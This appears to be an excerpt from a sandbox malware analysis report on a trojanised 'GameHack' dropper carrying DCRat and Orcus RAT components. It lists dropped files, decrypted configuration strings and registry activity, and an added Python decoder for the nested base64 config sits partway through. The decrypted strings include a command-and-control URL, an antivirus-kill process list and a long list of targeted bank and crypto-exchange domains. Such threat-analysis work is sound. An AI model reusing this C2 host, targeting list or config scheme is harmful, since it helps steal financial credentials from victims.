                      Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\SSblKNNQege.exe | ReversingLabs: Detection: 78%
                      Source: C:\Program Files\Microsoft\SSblKNNQege.exe | ReversingLabs: Detection: 67%
                      Source: C:\Program Files\Windows Portable Devices\SSblKNNQege.exe | ReversingLabs: Detection: 78%
                      Source: C:\ProgramData\WindowsHolographicDevices\SSblKNNQege.exe | ReversingLabs: Detection: 78%
                      Source: C:\Recovery\SSblKNNQege.exe | ReversingLabs: Detection: 78%
                      Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\SSblKNNQege.exe | ReversingLabs: Detection: 67%
                      Source: C:\Users\Default\Pictures\RuntimeBroker.exe | ReversingLabs: Detection: 78%
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\GameHack.exe | ReversingLabs: Detection: 65%
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\MpDefenderProtector.exe | ReversingLabs: Detection: 84%
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\Solara.exe | ReversingLabs: Detection: 58%
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exe | ReversingLabs: Detection: 67%
                      Source: C:\Users\user\AppData\Roaming\Windows\Defender\MpDefenderCoreProtion.exe | ReversingLabs: Detection: 84%
                      Source: C:\Users\user\AppData\Roaming\chainReviewdhcp\containerRuntime.exe | ReversingLabs: Detection: 78%
                      Source: C:\Users\user\Desktop\BpJZMyRc.log | ReversingLabs: Detection: 29%
                      Source: C:\Users\user\Desktop\ErvIhhWY.log | ReversingLabs: Detection: 33%
                      Source: C:\Users\user\Desktop\PxMOoBdB.log | ReversingLabs: Detection: 25%
                      Source: C:\Users\user\Desktop\WmQvmhxk.log | ReversingLabs: Detection: 70%
                      Source: C:\Users\user\Desktop\mOMkzqHG.log | ReversingLabs: Detection: 50%
                      Source: C:\Users\user\Desktop\syFrxmlp.log | ReversingLabs: Detection: 37%
                      Source: C:\Windows\Cursors\OfficeClickToRun.exe | ReversingLabs: Detection: 67%
                      Source: C:\Windows\L2Schemas\SSblKNNQege.exe | ReversingLabs: Detection: 78%
                      Source: C:\Windows\SoftwareDistribution\Download\9dbde960dbff0b004ef17a0616c3a8ef\RuntimeBroker.exe | ReversingLabs: Detection: 78%
                      Source: C:\Windows\security\database\SSblKNNQege.exe | ReversingLabs: Detection: 67%
                      Source: GameHackBuild1.exe.bin.exe | Virustotal: Detection: 61%
                      Source: GameHackBuild1.exe.bin.exe | ReversingLabs: Detection: 63%
                      Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
                      Source: C:\Program Files (x86)\MSECache\OfficeKMS\win8\SSblKNNQege.exe | Joe Sandbox ML: detected
                      Source: C:\Users\Default\Pictures\RuntimeBroker.exe | Joe Sandbox ML: detected
                      Source: C:\Program Files (x86)\MSBuild\SSblKNNQege.exe | Joe Sandbox ML: detected
                      Source: C:\Users\user\AppData\Roaming\Windows\Defender\MpDefenderCoreProtion.exe | Joe Sandbox ML: detected
                      Source: C:\Users\user\AppData\Roaming\chainReviewdhcp\containerRuntime.exe | Joe Sandbox ML: detected
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exe | Joe Sandbox ML: detected
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | Joe Sandbox ML: detected
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\GameHack.exe | Joe Sandbox ML: detected
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\MpDefenderProtector.exe | Joe Sandbox ML: detected
                      Source: GameHackBuild1.exe.bin.exe | Joe Sandbox ML: detected
                      Source: 00000017.00000002.1998107194.000000001BA70000.00000004.08000000.00040000.00000000.sdmp | String decryptor: {"0":[],"2a025748-b498-4ae9-8f8c-b763dd8b5ffc":{"_0":"Custom","_1":"True","_2":"True","_3":"True"},"ff275d84-13f9-47b8-9de6-a3dfeab3ea1e":{"_0":"Builds"},"20c484a2-7b5b-481d-bf01-55d423c9c2fd":{"_0":"chrome|p|o\nfirefox|p|o\nsafari|p|o\nmsedge|p|o\nopera|p|o\nyandex|p|o\nbrave|p|o\nbrowser|p|o\n\nkaspersky|p|r\nnorton|p|r\navast|p|r\nmcafee|p|r\nbitdefender|p|r\neset|p|r\navg|p|r\nsophos|p|r\ntrendmicro|p|r\nwindowsdefender|p|r\n\nkaspersky|w|r\nnorton|w|r\navast|w|r\nmcafee|w|r\nbitdefender|w|r\neset|w|r\navg|w|r\nsophos|w|r\ntrendmicro|w|r\nwindowsdefender|w|r"},"90f3c523-0b6b-4956-a617-29c89ed8da84":{"_0":"amegybank.com;associatedbank.com;ally.com;bankofthewest.com;bank7.com;barringtonbank.com;bbt.com;becu.org;beverlybank.com;bmoharris.com;bridgeviewbank.com;cffc.com;chase.com;citizensbank.com;classicbank.com;comerica.com;corebank.com;crystallakebank.com;dime.com;dollarbank.com;easternbank.com;53.com;finemarkbank.com;firstcommercebank.net;gorhamsavings.bank;happybank.com;hinsdalebank.com;lakeforestbank.com;libertyvillebank.com;mtb.com;emarquettebank.com;merchantsbankal.com;midwestone.com;morganstanley.com;macu.com;nbarizona.com;nsbank.com;northbrookbank.com;norrybank.com;oldplanktrailbank.com;pnc.com;onlinebanking.regions.com;renasantbank.com;rhinebeckbank.com;bankschaumburg.com;bankstcharles.com;sbotl.com;suntrust.com;tbkbank.com;tdbank.com;tiaabank.com;townbank.us;umpquabank.com;vectrabank.com;villagebankonline.bank;wheatonbank.com;wintrustbank.com;zionsbank.com;yobit.net;freebitco.in;zb.com;binance.com;huobi.com;okex.com;hitbtc.com;bitfinex.com;kraken.com;bitstamp.net;payoneer.com;bittrex.com;gate.io;exmo.com;yobit.io;bitflyer.com;poloniex.com;kucoin.com;coinone.co.kr;livecoin.net;mercatox.com;localbitcoins.com;korbit.co.kr;cex.io;luno.com;rocktrading.com;etherdelta.com;bleutrade.com;anxpro.com;c-cex.com;gatecoin.com;bitkonan.com;jubi.com;koinex.in;koineks.com;kuna.io;koinim.com;kiwi-coin.com;leoxchange.com;lykke.com;magnr.com;localtrade.cc;lbank.info;itbit.com;litebit.eu;liqui.io;ecoin.cc;indx.ru;fybse.se;freiexchange.com;fybsg.com;wildbitcoin.com;betchain.com;ethexindia.com;litecoinlocal.net;gemini.com;gdax.com;gatehub.net;satoshitango.com;foxbit.com.br;flowbtc.com.br;exx.com;exrates.me;excambriorex.com;ezbtc.ca;fargobase.com;fcce.jp;getbtc.org;glidera.io;indacoin.com;igot.com;idex.market;independentreserve.com;mercadobitcoin.com.br;infinitycoin.exchange;ice3x.co.za;guldentrader.com;heatwallet.com;hypex.nl;isx.ca;negociecoins.com.br;tradesatoshi.com;topbtc.com;tidex.com;mydicewallet.com;tuxexchange.com;usd-x.com;urdubit.com;tidebit.com;tdax.com;stex.com;stellarterm.com;spacebtc.com;surbitcoin.com;buda.com;xbtce.com;yunbi.com;zyado.com;trade.z.com;zaif.jp;wavesplatform.com;vircurex.com;vbtc.exchange;vaultoro.com;coinmarketcap.com;vwlpro.com;walltime.info;southxchange.com;shapeshift.io;nocks.com;nlexch.com;novaexchange.com;mynxt.info;nzbcx.com;nevbit.com;mixcoins.com;mr.exchange;neraex.pro;dsx.uk;okcoin.com;liquid.com;quoine.com;quadrigacx.
                      Source: 00000017.00000002.1998107194.000000001BA70000.00000004.08000000.00040000.00000000.sdmp | String decryptor: ["bj0UKX3O1fsx9BYPGXoKHqjvLayVva1jN63FIaBpzhY4ZE1D43om8NOuAFJtihcbnIkDHSHpW8UjRpWHjvb2vPk9sIFCRRHSF7QQdy5lw8PA2odUtBKwGkpYhlU9MEYF","DCR_MUTEX-KJuu1JY0vqv02KLL4nsh","0","Roblox NEW","","5","2","WyIxIiwiIiwiNSJd","WyIxIiwiV3lJaUxDSWlMQ0psZVVsM1NXcHZhV1V4VGxwVk1WSkdWRlZTVTFOV1drWm1VemxXWXpKV2VXTjVPR2xNUTBsNFNXcHZhVnB0Um5Oak1sVnBURU5KZVVscWIybGFiVVp6WXpKVmFVeERTWHBKYW05cFpFaEtNVnBUU1hOSmFsRnBUMmxLTUdOdVZteEphWGRwVGxOSk5rbHVVbmxrVjFWcFRFTkpNa2xxYjJsa1NFb3hXbE5KYzBscVkybFBhVXB0V1ZkNGVscFRTWE5KYW1kcFQybEtNR051Vm14SmFYZHBUMU5KTmtsdVVubGtWMVZwVEVOSmVFMURTVFpKYmxKNVpGZFZhVXhEU1hoTlUwazJTVzVTZVdSWFZXbE1RMGw0VFdsSk5rbHVVbmxrVjFWcFRFTkplRTE1U1RaSmJsSjVaRmRWYVV4RFNYaE9RMGsyU1c1U2VXUlhWV2xtVVQwOUlsMD0iXQ=="]
                      Source: 00000017.00000002.1998107194.000000001BA70000.00000004.08000000.00040000.00000000.sdmp | String decryptor: [["http://117813cm.n9shteam.in/","ExternalRequest"]]
                      Source: GameHackBuild1.exe.bin.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exe | Directory created: C:\Program Files\Microsoft\SSblKNNQege.exe
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exe | Directory created: C:\Program Files\Microsoft\f2aefc5695405c
                      Source: C:\Users\user\AppData\Roaming\chainReviewdhcp\containerRuntime.exe | Directory created: C:\Program Files\Windows Portable Devices\SSblKNNQege.exe
                      Source: C:\Users\user\AppData\Roaming\chainReviewdhcp\containerRuntime.exe | Directory created: C:\Program Files\Windows Portable Devices\f2aefc5695405c
                      Source: GameHackBuild1.exe.bin.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                      Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: GameHackBuild1.exe.bin.exe
                      Source: Binary string: q$costura.orcus.staticcommands.pdb.zip source: MpDefenderProtector.exe, 00000007.00000002.1312934413.0000000002901000.00000004.00000800.00020000.00000000.sdmp, MpDefenderCoreProtion.exe, 0000000D.00000002.1337493917.0000000003121000.00000004.00000800.00020000.00000000.sdmp, MpDefenderCoreProtion.exe, 00000011.00000002.2044904606.0000000003181000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000012.00000002.2519892872.0000000002E81000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: \Orcus-1.9.1-src-main\Orcus.Plugins\obj\Release\Orcus.Plugins.pdb8 source: MpDefenderProtector.exe, 00000007.00000002.1323937386.0000000004EC0000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: D:\Dokumente\GitHub\starksoft-aspen\Starksoft.Aspen\obj\Release\starksoft.aspen.pdbL source: RegAsm.exe, 00000012.00000002.2519892872.00000000031F8000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000012.00000002.2519892872.00000000031EA000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000012.00000002.2519892872.0000000003144000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000012.00000002.2519892872.00000000031D0000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000012.00000002.2540236748.0000000005E90000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: \Orcus-1.9.1-src-main\Orcus.StaticCommands\obj\Release\Orcus.StaticCommands.pdb source: RegAsm.exe, 00000012.00000002.2539787539.0000000005E60000.00000004.08000000.00040000.00000000.sdmp, RegAsm.exe, 00000012.00000002.2519892872.00000000030B5000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000012.00000002.2519892872.0000000003144000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: costura.fluentcommandlineparser.pdb.zip source: GameHackBuild1.exe.bin.exe, 00000000.00000003.1270548712.0000000004F89000.00000004.00000020.00020000.00000000.sdmp, MpDefenderCoreProtion.exe, 0000000D.00000002.1339479653.0000000004533000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: orcus.plugins;costura.orcus.plugins.dll.zip;costura.orcus.plugins.pdb.zip source: GameHackBuild1.exe.bin.exe, 00000000.00000003.1270548712.0000000004F89000.00000004.00000020.00020000.00000000.sdmp, MpDefenderCoreProtion.exe, 0000000D.00000002.1339479653.0000000004533000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: costura.orcus.shared.pdb.zip source: GameHackBuild1.exe.bin.exe, 00000000.00000003.1270548712.0000000004F89000.00000004.00000020.00020000.00000000.sdmp, MpDefenderProtector.exe, 00000007.00000002.1312934413.0000000002901000.00000004.00000800.00020000.00000000.sdmp, MpDefenderCoreProtion.exe, 0000000D.00000002.1339479653.0000000004533000.00000004.00000800.00020000.00000000.sdmp, MpDefenderCoreProtion.exe, 0000000D.00000002.1337493917.0000000003121000.00000004.00000800.00020000.00000000.sdmp, MpDefenderCoreProtion.exe, 00000011.00000002.2044904606.0000000003181000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000012.00000002.2519892872.0000000002E81000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: \Orcus-1.9.1-src-main\Orcus.Shared.Utilities\obj\Release\Orcus.Shared.Utilities.pdb source: MpDefenderProtector.exe, 00000007.00000002.1339235069.00000000058A0000.00000004.08000000.00040000.00000000.sdmp, MpDefenderProtector.exe, 00000007.00000002.1312934413.0000000002949000.00000004.00000800.00020000.00000000.sdmp, MpDefenderProtector.exe, 00000007.00000002.1312934413.0000000002AFB000.00000004.00000800.00020000.00000000.sdmp, MpDefenderCoreProtion.exe, 0000000D.00000002.1337493917.0000000003355000.00000004.00000800.00020000.00000000.sdmp, MpDefenderCoreProtion.exe, 0000000D.00000002.1337493917.000000000316A000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000012.00000002.2519892872.00000000030B5000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000012.00000002.2519892872.0000000002ECA000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: q'costura.fluentcommandlineparser.pdb.zip source: MpDefenderProtector.exe, 00000007.00000002.1312934413.0000000002901000.00000004.00000800.00020000.00000000.sdmp, MpDefenderCoreProtion.exe, 0000000D.00000002.1337493917.0000000003121000.00000004.00000800.00020000.00000000.sdmp, MpDefenderCoreProtion.exe, 00000011.00000002.2044904606.0000000003181000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000012.00000002.2519892872.0000000002E81000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: \Orcus-1.9.1-src-main\Orcus.Plugins\obj\Release\Orcus.Plugins.pdb source: MpDefenderProtector.exe, 00000007.00000002.1323937386.0000000004EC0000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: costura.orcus.staticcommands.pdb.zip source: GameHackBuild1.exe.bin.exe, 00000000.00000003.1270548712.0000000004F89000.00000004.00000020.00020000.00000000.sdmp, MpDefenderCoreProtion.exe, 0000000D.00000002.1339479653.0000000004533000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: directoryinfoex?costura.directoryinfoex.dll.zip?costura.directoryinfoex.pdb.zipUes.microsoft.win32.taskscheduler.resourcesucostura.es.microsoft.win32.taskscheduler.resources.dll.zip/fluentcommandlineparserOcostura.fluentcommandlineparser.dll.zipOcostura.fluentcommandlineparser.pdb.zipUfr.microsoft.win32.taskscheduler.resourcesucostura.fr.microsoft.win32.taskscheduler.resources.dll.zip/icsharpcode.sharpziplibOcostura.icsharpcode.sharpziplib.dll.zipUit.microsoft.win32.taskscheduler.resourcesucostura.it.microsoft.win32.taskscheduler.resources.dll.zip+jetbrains.annotationsKcostura.jetbrains.annotations.dll.zip source: GameHackBuild1.exe.bin.exe, 00000000.00000003.1270548712.0000000004F89000.00000004.00000020.00020000.00000000.sdmp, MpDefenderCoreProtion.exe, 0000000D.00000002.1339479653.0000000004533000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: costura.shelllibrary.pdb.zip source: GameHackBuild1.exe.bin.exe, 00000000.00000003.1270548712.0000000004F89000.00000004.00000020.00020000.00000000.sdmp, MpDefenderProtector.exe, 00000007.00000002.1312934413.0000000002901000.00000004.00000800.00020000.00000000.sdmp, MpDefenderCoreProtion.exe, 0000000D.00000002.1339479653.0000000004533000.00000004.00000800.00020000.00000000.sdmp, MpDefenderCoreProtion.exe, 0000000D.00000002.1337493917.0000000003121000.00000004.00000800.00020000.00000000.sdmp, MpDefenderCoreProtion.exe, 00000011.00000002.2044904606.0000000003181000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000012.00000002.2519892872.0000000002E81000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: orcus.shared9costura.orcus.shared.dll.zip9costura.orcus.shared.pdb.zip-orcus.shared.utilitiesMcostura.orcus.shared.utilities.dll.zipMcostura.orcus.shared.utilities.pdb.zip)orcus.staticcommandsIcostura.orcus.staticcommands.dll.zipIcostura.orcus.staticcommands.pdb.zip%sharpdx.direct3d11Ecostura.sharpdx.direct3d11.dll.zip#sharpdx.direct3d9Ccostura.sharpdx.direct3d9.dll.zip source: GameHackBuild1.exe.bin.exe, 00000000.00000003.1270548712.0000000004F89000.00000004.00000020.00020000.00000000.sdmp, MpDefenderCoreProtion.exe, 0000000D.00000002.1339479653.0000000004533000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: D:\Dokumente\GitHub\starksoft-aspen\Starksoft.Aspen\obj\Release\starksoft.aspen.pdb source: RegAsm.exe, 00000012.00000002.2519892872.00000000031F8000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000012.00000002.2519892872.00000000031EA000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000012.00000002.2519892872.0000000003144000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000012.00000002.2519892872.00000000031D0000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000012.00000002.2540236748.0000000005E90000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: C:\Users\dahall\Documents\Visual Studio 2010\Projects\TaskService\obj\Release\Microsoft.Win32.TaskScheduler.pdb source: MpDefenderCoreProtion.exe, 0000000D.00000002.1339479653.00000000042DB000.00000004.00000800.00020000.00000000.sdmp, MpDefenderCoreProtion.exe, 0000000D.00000002.1337493917.0000000003355000.00000004.00000800.00020000.00000000.sdmp, MpDefenderCoreProtion.exe, 0000000D.00000002.1366464067.00000000060F0000.00000004.08000000.00040000.00000000.sdmp, MpDefenderCoreProtion.exe, 0000000D.00000002.1339479653.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: costura.directoryinfoex.pdb.zip source: GameHackBuild1.exe.bin.exe, 00000000.00000003.1270548712.0000000004F89000.00000004.00000020.00020000.00000000.sdmp, MpDefenderProtector.exe, 00000007.00000002.1312934413.0000000002901000.00000004.00000800.00020000.00000000.sdmp, MpDefenderCoreProtion.exe, 0000000D.00000002.1339479653.0000000004533000.00000004.00000800.00020000.00000000.sdmp, MpDefenderCoreProtion.exe, 0000000D.00000002.1337493917.0000000003121000.00000004.00000800.00020000.00000000.sdmp, MpDefenderCoreProtion.exe, 00000011.00000002.2044904606.0000000003181000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000012.00000002.2519892872.0000000002E81000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: q&costura.orcus.shared.utilities.pdb.zip source: MpDefenderProtector.exe, 00000007.00000002.1312934413.0000000002901000.00000004.00000800.00020000.00000000.sdmp, MpDefenderCoreProtion.exe, 0000000D.00000002.1337493917.0000000003121000.00000004.00000800.00020000.00000000.sdmp, MpDefenderCoreProtion.exe, 00000011.00000002.2044904606.0000000003181000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000012.00000002.2519892872.0000000002E81000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: opuswrapper7costura.opuswrapper.dll.zip7costura.opuswrapper.pdb.zip source: GameHackBuild1.exe.bin.exe, 00000000.00000003.1270548712.0000000004F89000.00000004.00000020.00020000.00000000.sdmp, MpDefenderCoreProtion.exe, 0000000D.00000002.1339479653.0000000004533000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: \Orcus-1.9.1-src-main\Orcus.Shared\obj\Release\Orcus.Shared.pdb source: MpDefenderProtector.exe, 00000007.00000002.1315906643.0000000003A65000.00000004.00000800.00020000.00000000.sdmp, MpDefenderProtector.exe, 00000007.00000002.1335917183.0000000005270000.00000004.08000000.00040000.00000000.sdmp, MpDefenderCoreProtion.exe, 00000011.00000002.2071723679.000000000425D000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: costura.opuswrapper.pdb.zip source: GameHackBuild1.exe.bin.exe, 00000000.00000003.1270548712.0000000004F89000.00000004.00000020.00020000.00000000.sdmp, MpDefenderProtector.exe, 00000007.00000002.1312934413.0000000002901000.00000004.00000800.00020000.00000000.sdmp, MpDefenderCoreProtion.exe, 0000000D.00000002.1339479653.0000000004533000.00000004.00000800.00020000.00000000.sdmp, MpDefenderCoreProtion.exe, 0000000D.00000002.1337493917.0000000003121000.00000004.00000800.00020000.00000000.sdmp, MpDefenderCoreProtion.exe, 00000011.00000002.2044904606.0000000003181000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000012.00000002.2519892872.0000000002E81000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: shelllibrary9costura.shelllibrary.dll.zip9costura.shelllibrary.pdb.zip source: GameHackBuild1.exe.bin.exe, 00000000.00000003.1270548712.0000000004F89000.00000004.00000020.00020000.00000000.sdmp, MpDefenderCoreProtion.exe, 0000000D.00000002.1339479653.0000000004533000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: costura.orcus.shared.utilities.pdb.zip source: GameHackBuild1.exe.bin.exe, 00000000.00000003.1270548712.0000000004F89000.00000004.00000020.00020000.00000000.sdmp, MpDefenderCoreProtion.exe, 0000000D.00000002.1339479653.0000000004533000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: costura.orcus.plugins.pdb.zip source: GameHackBuild1.exe.bin.exe, 00000000.00000003.1270548712.0000000004F89000.00000004.00000020.00020000.00000000.sdmp, MpDefenderProtector.exe, 00000007.00000002.1312934413.0000000002901000.00000004.00000800.00020000.00000000.sdmp, MpDefenderCoreProtion.exe, 0000000D.00000002.1339479653.0000000004533000.00000004.00000800.00020000.00000000.sdmp, MpDefenderCoreProtion.exe, 0000000D.00000002.1337493917.0000000003121000.00000004.00000800.00020000.00000000.sdmp, MpDefenderCoreProtion.exe, 00000011.00000002.2044904606.0000000003181000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000012.00000002.2519892872.0000000002E81000.00000004.00000800.00020000.00000000.sdmp
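The two "String decryptor" entries above show where the DCRat configuration at the top of this section comes from: the decrypted array carries the mutex in the clear, and its last element is base64 of a JSON array whose own last element is again base64 of the JSON object reported as "Params" (the short element "WyIxIiwiIiwiNSJd" is the same scheme one level deep and decodes to ["1","","5"]). The decoder below is an added example, not code from Joe Sandbox or from the sample; it peels such base64-wrapped JSON recursively while leaving plain strings (mutex, flags, paths) untouched, so it can be pointed at the raw decryptor output. The nested SAMPLE_BLOB is constructed here to mirror the three layers seen in the report, and the function names are mine.

```python
"""Peel the nested base64/JSON layers used by the DCRat configuration.

Added example (not part of the sandbox report).  Rule: a string is replaced by
its decoded value only if it is well-formed standard base64 AND the decoded
bytes are a JSON array/object.  Anything else (mutex names, "true"/"false",
paths) is left as-is, and the recursion is depth-bounded.
"""
import base64
import binascii
import json
import string

_B64_ALPHABET = set(string.ascii_letters + string.digits + "+/=")


def _maybe_b64(s):
    """Return decoded bytes if *s* is well-formed standard base64, else None."""
    if not s or len(s) % 4 or not set(s) <= _B64_ALPHABET:
        return None
    try:
        return base64.b64decode(s, validate=True)
    except (binascii.Error, ValueError):
        return None


def _maybe_json(raw):
    """Return the JSON array/object encoded by *raw* bytes, else None."""
    try:
        text = raw.decode("utf-8")
    except UnicodeDecodeError:
        return None
    if text.lstrip()[:1] not in ("[", "{"):
        return None
    try:
        return json.loads(text)
    except json.JSONDecodeError:
        return None


def peel(value, max_depth=8):
    """Recursively decode base64-wrapped JSON inside lists, dicts and strings.

    max_depth bounds the recursion so a hostile blob cannot nest forever;
    when the budget runs out the value is returned as found.
    """
    if max_depth <= 0:
        return value
    if isinstance(value, list):
        return [peel(v, max_depth - 1) for v in value]
    if isinstance(value, dict):
        return {k: peel(v, max_depth - 1) for k, v in value.items()}
    if isinstance(value, str):
        raw = _maybe_b64(value)
        if raw is not None:
            decoded = _maybe_json(raw)
            if decoded is not None:
                return peel(decoded, max_depth - 1)
    return value


def _wrap(obj):
    """Constructed helper: one DCRat-style layer, JSON then base64."""
    return base64.b64encode(json.dumps(obj).encode()).decode()


# Short element copied from the report's decryptor output; peels to ["1","","5"].
REPORT_SHORT = "WyIxIiwiIiwiNSJd"

# Constructed sample (not from the report) mirroring the three layers observed:
# innermost "Params" object, wrapped into ["","",<b64>], wrapped into ["1",<b64>].
SAMPLE_PARAMS = {"0": "{SYSTEMDRIVE}/Users/", "1": "false", "2": "false", "3": "true"}
SAMPLE_BLOB = _wrap(["1", _wrap(["", "", _wrap(SAMPLE_PARAMS)])])


if __name__ == "__main__":
    print(json.dumps(peel(REPORT_SHORT)))
    print(json.dumps(peel(SAMPLE_BLOB), indent=2))
```

Feed `peel()` the whole decrypted array from the second decryptor line and the long trailing element unfolds to ["1", ["", "", {...}]] with the same Params map the extractor reports; strings such as "DCR_MUTEX-..." fall through unchanged because they are not valid base64.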

                      Spreading

                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | System file written: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                      Source: C:\Users\user\AppData\Roaming\Windows\Defender\MpDefenderCoreProtion.exe | Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\InprocServer32
                      Source: C:\Users\user\AppData\Roaming\Windows\Defender\MpDefenderCoreProtion.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\InprocServer32
                      Source: C:\Users\user\AppData\Roaming\Windows\Defender\MpDefenderCoreProtion.exe | Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
                      Source: C:\Users\user\AppData\Roaming\Windows\Defender\MpDefenderCoreProtion.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\InprocServer32
                      Source: C:\Users\user\AppData\Roaming\Windows\Defender\MpDefenderCoreProtion.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
                      Source: C:\Users\user\AppData\Roaming\Windows\Defender\MpDefenderCoreProtion.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
                      Source: C:\Users\user\AppData\Roaming\Windows\Defender\MpDefenderCoreProtion.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
                      Source: C:\Users\user\AppData\Roaming\Windows\Defender\MpDefenderCoreProtion.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32
                      Source: C:\Users\user\AppData\Roaming\Windows\Defender\MpDefenderCoreProtion.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler
                      Source: C:\Users\user\AppData\Roaming\Windows\Defender\MpDefenderCoreProtion.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer32
                      Source: C:\Users\user\AppData\Roaming\Windows\Defender\MpDefenderCoreProtion.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer
                      Source: C:\Users\user\AppData\Roaming\Windows\Defender\MpDefenderCoreProtion.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Elevation
                      Source: C:\Users\user\Desktop\GameHackBuild1.exe.bin.exe | Code function: 0_2_00A0A5F4 FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,0_2_00A0A5F4
                      Source: C:\Users\user\Desktop\GameHackBuild1.exe.bin.exe | Code function: 0_2_00A1B8E0 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,0_2_00A1B8E0
